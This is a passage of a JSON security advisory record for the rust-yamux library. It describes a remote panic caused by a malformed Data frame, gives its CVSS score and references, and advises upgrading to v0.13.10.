Patches\nUsers should upgrade to `yamux` `v0.13.10`\n\nThis vulnerability was originally submitted by @revofusion to the Ethereum Foundation bug bounty program",
  "id": "GHSA-vxx9-2994-q338",
  "modified": "2026-03-16T22:01:11Z",
  "published": "2026-03-13T20:04:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/libp2p/rust-yamux/security/advisories/GHSA-vxx9-2994-q338"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32314"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/libp2p/rust-yamux"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Yamux vulnerable to remote Panic via malformed Data frame with SYN set and len = 262145"
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.